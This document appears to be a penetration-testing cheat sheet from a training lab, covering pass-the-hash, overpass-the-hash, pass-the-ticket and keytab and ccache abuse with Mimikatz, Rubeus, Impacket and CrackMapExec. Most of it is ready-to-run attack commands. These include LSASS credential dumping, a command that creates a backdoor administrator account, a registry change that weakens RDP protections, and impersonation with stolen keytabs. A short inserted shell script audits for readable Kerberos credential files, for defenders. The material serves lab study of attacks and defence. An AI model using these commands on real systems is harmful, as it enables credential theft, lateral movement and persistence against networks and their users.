Pass The Hash (Mimikatz)
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit
Pass The Hash (Invoke-TheHash)
# Import Module
Import-Module .\Invoke-TheHash.psd1
# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose
# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"
Pass The Hash Impacket (Linux)
impacket-psexec administrator@<IP> -hashes :<hash>
Pass The Hash CrackMapExec (Linux)
crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-auth
Pass The Hash RDP
# Enable Restricted Admin mode (required before RDP will accept a hash)
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# RDP
xfreerdp /v:<IP> /u:<user> /pth:<hash>
Harvesting Tickets From Windows
# Mimikatz
## Check Privs
privilege::debug
# Show Tickets
sekurlsa::tickets /export
# Rubeus
Rubeus.exe dump /nowrap
Pass the Key or OverPass the Hash
# Mimikatz Extract Keys
privilege::debug
sekurlsa::ekeys
# Mimikatz OverPass the Hash
sekurlsa::pth /domain:inlanefreight.htb /user:<user> /ntlm:<rc4_value>
# Rubeus
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<aes256_hmac_value>
Pass the Ticket (PtT)
# Rubeus
## /ptt -> inject the requested ticket into the current session
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<rc4_value> /ptt
# Import .kirbi
Rubeus.exe ptt /ticket:file.kirbi
# Base64 Encode .kirbi (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.kirbi"))
# Import With Base64
Rubeus.exe ptt /ticket:<base64>
Pass The Ticket PowerShell Remoting
# Import Ticket (Mimikatz)
kerberos::ptt "file.kirbi"
# Enter PC
Enter-PSSession -ComputerName <computername>
Pass The Ticket (From Linux)
Check Linux Machine Domain Joined
realm list
ps -ef | grep -i "winbind\|sssd"
Find Keytab Files
find / -name "*keytab*" -ls 2>/dev/null
Find ccache Files
A credential cache (ccache) file holds a user's Kerberos tickets for as long as they remain valid, which in practice usually means for the length of that user's session.
Abusing KeyTab Files
# klist: list keytab entries
klist -k -l
# Impersonate Other User
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
# Verify
klist
# Extract the hashes stored in a keytab
python3 /opt/blackbuntu/keytabextract.py file.keytab
Abusing ccache Files
To abuse a ccache file, all we need is read access to it. These files live in /tmp and can normally be read only by the user who created them, but with root access we could use any of them.
# Import ccache file
export KRB5CCNAME=<file>
klist
# Able to read DC
smbclient //dc01/C$ -k -c ls --no-pass
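As an added, defender-side example that is not part of these notes: a small POSIX shell audit that walks a directory for the keytab and ccache files discussed in the two sections above and reports any that are readable by group or others, which is exactly the condition that lets another local user pick them up. The default ccache name krb5cc_<uid> and the .keytab suffix are assumptions about naming; the sample tree is constructed inline so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the original notes.
# Assumptions: ccache files use the MIT default name krb5cc_<uid> and keytabs
# end in .keytab; the directory argument defaults to /tmp, where the notes
# say ccache files are kept.

# Print every ccache or keytab under $1 that group or others can read.
# -perm -004 = others-read bit set, -perm -040 = group-read bit set (POSIX find).
audit_krb_cred_files() {
    dir="${1:-/tmp}"
    find "$dir" -type f \
        \( -name 'krb5cc_*' -o -name '*.keytab' \) \
        \( -perm -004 -o -perm -040 \) \
        -print 2>/dev/null
}

# Number of findings, handy as a non-zero exit status from cron or CI.
audit_krb_cred_count() {
    audit_krb_cred_files "$1" | wc -l | tr -d ' '
}

# Constructed sample tree so the example has something to audit offline.
make_sample_tree() {
    d=$(mktemp -d)
    printf 'ticket' > "$d/krb5cc_1000";  chmod 600 "$d/krb5cc_1000"    # owner only: fine
    printf 'ticket' > "$d/krb5cc_1001";  chmod 644 "$d/krb5cc_1001"    # world-readable: finding
    printf 'keys'   > "$d/carlos.keytab"; chmod 640 "$d/carlos.keytab"  # group-readable: finding
    printf 'other'  > "$d/notes.txt";    chmod 644 "$d/notes.txt"       # not Kerberos material: ignored
    printf '%s' "$d"
}

# Stand-alone run: audit the constructed tree, then clean it up.
sample=$(make_sample_tree)
audit_krb_cred_files "$sample"
rm -rf "$sample"
```

Run it against the real /tmp with `audit_krb_cred_files /tmp`; an empty result means every cached credential is owner-readable only, and any path it prints is one a defender should fix (chmod 600 and, for ccaches, confirm the owning uid matches the user whose ticket it holds).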
Convert ccache file for Windows
https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py